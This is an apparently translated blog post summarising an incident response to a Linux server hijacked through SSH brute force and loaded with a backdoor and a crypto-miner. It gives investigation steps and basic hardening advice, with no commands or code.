A record of a Linux server intrusion emergency response (summary)

Recently, we received a request for help from a customer. They received information from the managed telecommunications computer room, notifying them that one of their servers was detected sending attack traffic externally. Hopefully we can help troubleshoot the issue.

1. Confirm the security incident

The situation is urgent and the first thing to do is to confirm the authenticity of the security incident. After communicating with the server operation and maintenance personnel, we learned that the business was only applied in the intranet, but the server was actually opened to the public network, could be pinged directly on the public network, and the 22 remote port was opened. From this point, it can be basically confirmed that the server has been hacked.

2. Log Analysis

It is speculated that the hacker may have logged into the server through SSH brute force. Check the logs in /var/log and find that most of the log information has been cleared, but the secure logs are not destroyed. A large number of SSH login failure logs can be seen, and there are records of root users successfully logging in after multiple failed logins, which meets the characteristics of brute force cracking.

By checking the threat intelligence, it was found that multiple IP addresses used for brute force attacks all had malicious scanning behaviors.

3. System Analysis

Check the key system configurations, accounts, historical records, etc. to confirm the impact on the system

It was found that the history records in /root/.bash_history had been cleared, and there were no other abnormalities.

4. Process Analysis

Check current active processes, network connections, startup items, scheduled tasks, etc.

The following issues were found:

1) Abnormal network connection

By checking the system network connection, it was found that there was a Trojan backdoor program te18 with external network connection.

The file was found to be a Linux backdoor program when it was checked online.

2) Abnormal scheduled tasks

By checking the crontab scheduled tasks, it is found that there are abnormal scheduled tasks.

Analyze the scheduled task running file and startup parameters

Online check and kill related files are mining programs

View the mining pool configuration file

5. Document Analysis

Malicious code and related operation files implanted by hackers were found in the /root directory.

Hackers create a hidden folder /root/.s/ to store mining-related programs.

6. Backdoor Investigation

Finally, use RKHunter to scan the system backdoor

VII. Conclusion

Through the above analysis, we can determine that the hacker cracked the root user password through SSH blasting, and logged into the system to implant mining programs and Trojan backdoors.

Reinforcement suggestions

1) Delete crontab scheduled tasks (delete the contents of the file /var/spool/cron/root) and delete the malicious files implanted by hackers on the server.

2) Modify all system user passwords and meet the password complexity requirements: more than 8 characters, including a combination of uppercase and lowercase letters + numbers + special symbols;

3) If not necessary, prohibit the SSH port from being opened to the external network, or modify the default SSH port and limit the allowed access IP;

The above is the full content of this article. I hope it will be helpful for everyone’s study. I also hope that everyone will support 123WORDPRESS.COM.